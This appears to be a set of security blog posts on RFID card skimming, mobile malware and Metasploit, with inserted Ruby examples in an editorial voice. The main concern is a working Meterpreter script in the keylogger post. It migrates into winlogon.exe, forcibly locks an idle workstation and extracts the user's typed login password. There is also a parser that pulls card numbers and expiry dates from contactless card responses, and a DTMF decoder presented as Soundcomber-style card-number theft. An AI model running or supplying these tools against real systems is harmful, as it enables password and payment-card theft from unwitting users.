Pulling Passport, Drivers License and Credit Card Info from Thin Air

Can your ID be stolen by just walking past a hacker?

… According to the Identity Theft Resource Center, the Smart Card Alliance states that “the financial payments industry has designed multiple layers of security throughout the traditional credit and debit payment systems to protect all parties involved in the payment transaction. For contactless payments (RFID), the financial industry uses added security technology, both on the contactless device (RFID card), as well as in the processing network and system to prevent fraud.”

The article goes on to state that industry-standard encryption, authentication, confidentiality and control are some of the security measures being used to protect your identity. But how well does this added security work?

Well, here is where things get really murky. You have some authorities claiming that contactless credit cards are safe, but you have others showing that they clearly aren’t.

Even Mythbusters has been caught up in the drama. In 2008, they were going to do a show on RFID, but caved in to external pressure not to do the show. Later, they released a statement that they had not been pressured to cancel it.

In December 2010, WREG, Channel 3 News in Memphis, decided to put this to the test. Walt Augustinowicz (of Identity Stronghold), armed with a netbook and a wireless card reader he bought online for under $100, patrolled Beale Street for one hour looking for volunteers. Twenty people volunteered to be scanned and, of these, he was able to read the account number and expiration date of five people who carried RFID-enabled credit cards…

Selection from an article written for The Office Survivalist; continue reading here.

Chris Paget has done a lot of research into this issue. The record for reading one of these chips is over 200 feet, and he has argued that with enough power they could be read from over a mile. One caveat worth knowing: those long-range results were against UHF (EPC Gen 2) tags of the kind used in passport cards and Enhanced Driver’s Licenses, which are designed to be read at a distance. The 13.56 MHz chips in contactless credit cards and passport books are built for a range of a few inches, and while custom antennas extend that somewhat, reads like the Beale Street demo happen at close quarters. For more info check out Chris’s Black Hat talk “Extreme Range RFID” and his appearance on Fox News.

Apparently, the security code printed on the back of the credit card is one of the saving graces: it is not stored on the chip, so it is not transmitted wirelessly along with the account number and expiration date. But not all merchants require it for a purchase. Most card issuers offer full refunds for fraudulent purchases, and, as far as is known, this technique has never been used to actually steal card data.
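To make that concrete, here is an added example (written for this post; it is not code from the WREG demo or from Identity Stronghold) of what a reader actually gets back when it pulls a record off a contactless EMV card, and how little work it takes to turn that into an account number and expiry date. The record bytes are constructed around the test PAN 4111 1111 1111 1111; a real reader obtains the same kind of bytes over ISO 14443 with SELECT PPSE, SELECT AID, GET PROCESSING OPTIONS and READ RECORD. Note what is missing: the security code printed on the back has no tag in this record, so there is nothing for the parser to find.

```ruby
# Added example (not code from the post or from the WREG demo): decode the
# EMV READ RECORD response a contactless reader gets back from a card and
# list what is readable in the clear.  SAMPLE_RESPONSE is constructed here
# around the test PAN 4111 1111 1111 1111; a real reader obtains the same
# bytes over ISO 14443 via SELECT PPSE / SELECT AID / GPO / READ RECORD.

SAMPLE_HEX = %w[
  701B
  5A08 4111111111111111
  5F2403 131231
  5F2008 444F452F4A4F484E
  9000
].join.freeze
#   70 1B  READ RECORD response template, 27 bytes follow
#   5A     Application PAN (BCD digits)
#   5F24   Application expiration date, YYMMDD
#   5F20   Cardholder name ("DOE/JOHN")
#   9000   status word: success
SAMPLE_RESPONSE = [SAMPLE_HEX].pack('H*').freeze

# Flatten BER-TLV into { tag => value }, descending into constructed tags
# (bit 6 of the first tag byte set, e.g. 70).  A length that runs past the
# buffer raises instead of silently truncating, since the card controls it.
def parse_tlv(data)
  bytes = data.bytes
  found = {}
  pos = 0
  while pos < bytes.length
    first = bytes[pos]
    tag = first
    pos += 1
    if (first & 0x1F) == 0x1F                       # multi-byte tag (5F24, 9F..)
      loop do
        tag = (tag << 8) | bytes.fetch(pos)
        pos += 1
        break if (bytes[pos - 1] & 0x80).zero?      # high bit clear: last tag byte
      end
    end
    length = bytes.fetch(pos)
    pos += 1
    if (length & 0x80) != 0                         # long form: 0x8N, then N bytes
      n = length & 0x7F
      length = bytes[pos, n].inject(0) { |acc, b| (acc << 8) | b }
      pos += n
    end
    if pos + length > bytes.length
      raise ArgumentError, format('tag %X length %d overruns record', tag, length)
    end
    value = bytes[pos, length].pack('C*')
    pos += length
    if (first & 0x20) != 0                          # constructed: recurse
      found.merge!(parse_tlv(value))
    else
      found[tag] = value
    end
  end
  found
end

# Split off the status word, parse the record and return the fields a
# hand-held reader would display.  cvv2 is always nil: the code printed on
# the back of the card has no tag in this record.
def card_data_in_the_clear(response)
  raise ArgumentError, 'response too short' if response.bytesize < 2
  sw = response.byteslice(-2, 2).unpack1('H*')
  raise ArgumentError, "card returned SW #{sw}" unless sw == '9000'
  fields = parse_tlv(response.byteslice(0, response.bytesize - 2))
  pan = fields.fetch(0x5A).unpack1('H*').upcase.sub(/F+\z/, '')  # strip BCD pad nibble
  yy, mm, dd = fields.fetch(0x5F24).unpack1('H*').scan(/../)
  {
    pan: pan,
    expiry: "20#{yy}-#{mm}-#{dd}",
    name: fields.fetch(0x5F20).strip,
    cvv2: nil,
  }
end

if $PROGRAM_NAME == __FILE__
  card_data_in_the_clear(SAMPLE_RESPONSE).each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Run it with ruby and it prints the PAN, expiry and cardholder name while the cvv2 slot stays nil, which is exactly the split the paragraph above describes. The overrun check is there because the length bytes come from the card: a hostile or damaged card can hand back a length that points past the buffer, and a reader that trusts it blindly is the next thing to get exploited.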

It would seem hackers prefer databases that store thousands of credit card numbers to walking around waving an RFID reader around people’s butts after a football game.

RFID-blocking sleeves and wallets are available that prevent these signals from being read remotely. You can also ask your bank for a non-RFID credit card. Passports have shielding material in the cover, and currently only a few states issue RFID-enabled driver’s licenses.

New Mobile Malware and How to Defend Against it

Just watched a very good mobile malware update video from Hacking Exposed!

I haven’t really been keeping up with smart phone tech or smart phone viruses, but the webinar was very informative. The speaker covered several of the current malware threats. I was actually surprised to see how closely they behave to PC viruses.

Android.Nickispy, once installed, can record phone conversations along with the GPS coordinates of the phone. The data is saved as audio files in a directory called “Shangzhou” on the SD card. Then, just like a PC bot, the files are pushed up to a command and control server.

The speaker’s theory about recording the GPS location with each call was that a large, unnamed country that has been snarfing a lot of military and intelligence data could use it to focus on cell phones in a particular area.

He also mentioned Soundcomber, a proof-of-concept Android trojan. It records phone calls and uses audio processing to pull credit card numbers out of the conversation. In the demo, the user calls a credit card company; on the first call he speaks his (fake) credit card number into the phone, and on the second call he enters it on the keypad, which sends the digits as DTMF tones.

Using audio processing, Soundcomber pulled the correct credit card numbers from both calls and displayed them on the command and control server.
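To show what the keypad half of that demo involves, here is an added example (written for this post, not Soundcomber’s code) that decodes keypad digits from call audio with the Goertzel algorithm, the standard DTMF detector. It synthesizes the tones itself so it runs offline; a trojan would feed in the recorded call instead. The 205-sample frame, the power and ratio thresholds and the 100 ms tone/gap timing are choices made for this example, not values taken from the webinar.

```ruby
# Added example, not Soundcomber's code: recover keypad-entered digits from
# call audio by decoding DTMF with the Goertzel algorithm.  The audio is
# synthesized here so the script runs offline; a real recorder would pass
# in the captured call samples (mono, 8 kHz) instead.

RATE = 8000
FRAME = 205                            # ~25.6 ms; bins fall close to every DTMF tone
ROW_FREQS = [697, 770, 852, 941].freeze
COL_FREQS = [1209, 1336, 1477, 1633].freeze
KEYS = %w[123A 456B 789C *0#D].freeze   # KEYS[row][col]
MIN_POWER = 0.05    # normalized: an on-bin tone of amplitude A scores ~A**2
MIN_RATIO = 4.0     # strongest bin must beat the runner-up by this factor

# Build a mono float signal: each key is its row tone plus its column tone
# (amplitude 0.5 each) followed by silence.  Tone and gap lengths are chosen
# so that a gap always contains at least one frame of pure silence.
def synthesize(digits, tone_ms: 100, gap_ms: 100)
  samples = []
  digits.each_char do |d|
    r = KEYS.index { |row| row.include?(d) }
    raise ArgumentError, "not a DTMF key: #{d}" if r.nil?
    fr = ROW_FREQS[r]
    fc = COL_FREQS[KEYS[r].index(d)]
    (RATE * tone_ms / 1000).times do |n|
      t = n.to_f / RATE
      samples << 0.5 * Math.sin(2 * Math::PI * fr * t) + 0.5 * Math.sin(2 * Math::PI * fc * t)
    end
    samples.concat(Array.new(RATE * gap_ms / 1000, 0.0))
  end
  samples
end

# Goertzel: power at the DFT bin nearest `freq`, normalized so a full-frame
# on-bin tone of amplitude A gives about A**2 regardless of frame length.
def goertzel_power(frame, freq)
  n = frame.length
  k = (n * freq.to_f / RATE).round
  coeff = 2.0 * Math.cos(2.0 * Math::PI * k / n)
  s1 = s2 = 0.0
  frame.each do |x|
    s0 = x + coeff * s1 - s2
    s2, s1 = s1, s0
  end
  (s1 * s1 + s2 * s2 - coeff * s1 * s2) / (n / 2.0)**2
end

# Return the frequency from `freqs` that dominates this frame, or nil when
# the frame is silence or too ambiguous (e.g. a frame straddling a tone edge).
def strongest(frame, freqs)
  ranked = freqs.map { |f| [goertzel_power(frame, f), f] }.sort.reverse
  (p1, f1), (p2, _) = ranked
  return nil if p1 < MIN_POWER || p1 < MIN_RATIO * p2
  f1
end

def classify_frame(frame)
  fr = strongest(frame, ROW_FREQS)
  fc = strongest(frame, COL_FREQS)
  return nil if fr.nil? || fc.nil?
  KEYS[ROW_FREQS.index(fr)][COL_FREQS.index(fc)]
end

# One character per key press: a press begins when a frame classifies as a
# key right after a frame that did not, so repeated digits ("11") survive.
def decode_dtmf(samples)
  out = +''
  last = nil
  samples.each_slice(FRAME) do |frame|
    next if frame.length < FRAME
    key = classify_frame(frame)
    out << key if key && key != last
    last = key
  end
  out
end

if $PROGRAM_NAME == __FILE__
  puts decode_dtmf(synthesize('4111'))
end
```

Decoding a spoken card number, the first half of the Soundcomber demo, is a speech recognition problem and well beyond a few dozen lines, but the keypad half really is this cheap, which is why the speaker’s point about phone malware behaving like PC malware holds: the hard part is already commodity signal processing.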

A lot more was covered, including how hackers are creating apps that pass verification and are published in the app store, but when installed, pull down malicious updates. Bluetooth vulnerabilities and a “Truly Evil Hack” were also discussed.

Finally, how to defend against mobile malware was discussed. Surprisingly, the techniques were very similar to the PC world:

  • Don’t run programs from publishers that you don’t know and trust
  • Set strong passwords
  • Disable unnecessary startup apps
  • Disable unneeded Wi-Fi, GPS and Bluetooth radios
  • Minimize remote unlocking services
  • Run mobile whitelisting or anti-virus software

This is just a quick overview of the hour long video. The video should be posted on the Hacking Exposed website soon, check it out, it is very informative and well worth the time.

Capturing Windows Login Passwords with Keyscan & Lockout_Keylogger

Sometimes a penetration tester has remote access to a user’s machine but not the user’s password. Maybe the user has a very long, complex password that would take too long to crack. What can he do?

The Metasploit Framework included with BackTrack 5 has a great utility for capturing keys pressed on a target machine. Once you have a Meterpreter session, simply typing “keyscan_start” starts the built-in keylogger. After a while, if you want to see what was typed, enter “keyscan_dump”:

Here you can see from this demo key log dump that the user went to “google.com” and did a search for “Dallas Cowboys Stats”.

Now, if you look at the next key dump in the picture above, you see something odd: <LWin> (the Windows key) followed by an “l”. Pressing Win+L on a Windows system locks the desktop and prompts for the password to log back in.

The user must have locked his desktop, and went to get a cup of coffee. Everyone knows that you can’t read football stats without a good cup of joe. The user returned and logged back in. What luck, we have captured a login!

But wait a minute, why is there no password listed?

The problem is the way Windows separates keyboard input. Simply put, the user’s interactive session (the default desktop) and winlogon (the login and lock screen, which runs on the separate Winlogon desktop) receive keystrokes independently, and a keylogger only sees the keys typed on the desktop its process is attached to. If you are sniffing the active session, you cannot capture keys entered at the login screen, or vice versa.

You need to move your keylogger to the desktop you want to monitor. In this case, migrating our Meterpreter session into the winlogon.exe process puts us in the right place to catch passwords. Migrating into winlogon requires SYSTEM privileges, so run getsystem first if you do not already have them. Then start keyscan again:

In the picture above, the first key dump covers the keys pressed while the user was logged in; because we are now monitoring the winlogon desktop, nothing is displayed. But since our target needed another cup of coffee to get through his busy day of web surfing, he locked his desktop and then logged in again. If you look at the second key dump in the picture above, you will see his full 27-character password.

Now, what would be great is if we could automate this process. I mean do you really want to just sit there and hang out until the user leaves his system? You could force his desktop into locked mode and make him log in again, but this is pretty suspicious. What if you could have meterpreter automatically find and migrate to the winlogon process, then scan the computer idle time and automatically put the user’s system into locked mode? Finally, what would be really nice is if the script notified you when the user logs back in and gives you a text dump of his password.

Meet “Lockout_Keylogger” (formerly called “smartlocker”), an amazing Meterpreter script made by CG and Mubix:

Lockout_Keylogger automates the entire process from beginning to end. The user walks away from his PC, the script waits a certain amount of idle time and then puts the computer into locked mode. Then, when he logs back in, it is already set to scan the keys pressed.

The password could be a simple 4 character password or a complex 30 character monster, it does not matter. Lockout_Keylogger intercepts it and displays it in plain text on the penetration tester’s machine.
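As an added example (written for this post; it is not the Lockout_Keylogger script, which is CG and Mubix’s work), here is a minimal Meterpreter script that walks the same path by hand, with the two pieces that can be checked offline pulled out as plain Ruby methods: picking the right winlogon.exe, and turning keyscan_dump text into the password. The Meterpreter calls (client.sys.process.get_processes, client.core.migrate, client.ui.idle_time, client.ui.keyscan_start, keyscan_dump and keyscan_stop, client.sys.process.execute) are stdapi methods and only do anything inside a live session. The five-minute idle threshold, the explorer.exe session-matching rule for choosing a winlogon, and the assumed keyscan_dump text format (printable keys verbatim, special keys as <Return>, <Back>, <Shift> and the like, as in the dumps shown above) are my assumptions, not something the script or the post specifies.

```ruby
# Added example, not the Lockout_Keylogger script by CG and Mubix: a minimal
# Meterpreter script that migrates into winlogon.exe, waits for the user to go
# idle, locks the workstation and reads the password back out of the keyscan
# buffer.  find_winlogon and password_from_dump are pure Ruby; everything under
# `client.` is Meterpreter stdapi and only runs inside a live session.

IDLE_SECONDS = 300   # assumed threshold: lock after five idle minutes
POLL_SECONDS = 15

# Pick the winlogon.exe serving the interactive user: the one that shares a
# session id with explorer.exe (assumption; falls back to the first match).
# `procs` is the array of hashes get_processes returns ('pid', 'name', 'session', ...).
def find_winlogon(procs)
  explorer = procs.find { |p| p['name'].to_s.casecmp('explorer.exe').zero? }
  candidates = procs.select { |p| p['name'].to_s.casecmp('winlogon.exe').zero? }
  return nil if candidates.empty?
  chosen = explorer && candidates.find { |p| p['session'] == explorer['session'] }
  (chosen || candidates.first)['pid']
end

# Turn keyscan_dump text captured on the winlogon desktop into the password.
# Assumed format: printable keys verbatim, specials as <Name>.  <Back> deletes,
# <Return> ends entry; other <...> tokens (Shift, Ctrl+Alt+Del on domain
# boxes) are ignored.  Returns nil until a <Return> has been seen.
def password_from_dump(dump)
  typed = +''
  dump.scan(/<[^>]+>|./m) do |tok|
    case tok
    when '<Return>'     then return typed
    when '<Back>'       then typed.chop!
    when "\n", "\r"     then next
    when /\A<.*>\z/     then next
    else typed << tok
    end
  end
  nil
end

def run(client)
  pid = find_winlogon(client.sys.process.get_processes)
  raise 'winlogon.exe not found; are you SYSTEM? (try getsystem)' if pid.nil?
  client.core.migrate(pid) unless client.sys.process.getpid == pid
  client.ui.keyscan_start
  # Wait for the user to walk away, then lock the workstation the same way
  # Win+L does; the next thing typed on the winlogon desktop is the password.
  sleep(POLL_SECONDS) until client.ui.idle_time >= IDLE_SECONDS
  client.sys.process.execute('rundll32.exe', 'user32.dll,LockWorkStation', 'Hidden' => true)
  buffer = +''
  loop do
    sleep(POLL_SECONDS)
    buffer << client.ui.keyscan_dump.to_s   # accumulate: a dump may split the password
    pw = password_from_dump(buffer)
    next if pw.nil?
    client.ui.keyscan_stop
    return pw
  end
end

puts run(client) if defined?(client)   # `client` exists only inside Meterpreter
```

Two details worth keeping even if you use the real script: the migrate into winlogon.exe fails unless the session is SYSTEM, so getsystem first, and the dump is accumulated across polls so a password that arrives split over two keyscan_dump calls is not lost.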

Backtrack Metasploit Megaprimer on SecurityTube.net

The Metasploit Framework included with the BackTrack series is an amazing platform for penetration and security testing. The capabilities are just stunning. The problem is that the learning curve can be steep, especially for new users.

There are many video training tutorials out there and Offensive Security even offers the free “Metasploit Unleashed” training which is very good. But it would be nice to have a comprehensive video series that starts with the very basics of Metasploit and leads you through the entire platform to the more advanced features.

Look no further than Vivek Ramachandran’s “Metasploit Megaprimer” video series. Vivek has created a huge training session on Metasploit spanning almost 20 videos. The training is top notch, and very easy to follow.

Some of the topics covered include:

  • Meterpreter Basics and Using Stdapi
  • Meterpreter Extensions
  • Database Integration
  • Post Exploitation Kung Fu
  • Post Exploitation Privilege Escalation
  • Backdoors, Pivoting, Port Forwarding and much, much, more!

I had the absolute honor of working with Vivek as a technical editor on his just released book “BackTrack 5 Wireless Penetration Testing Beginner’s Guide“. He is one of the top security experts of India, has spoken at numerous security conferences, and runs the very popular website “SecurityTube”.

Vivek has an amazing ability to take very complex ideas and break them down into easy-to-understand lessons. If you are new to Metasploit, or want to learn more about it, check out the Metasploit Megaprimer. It will be time well spent!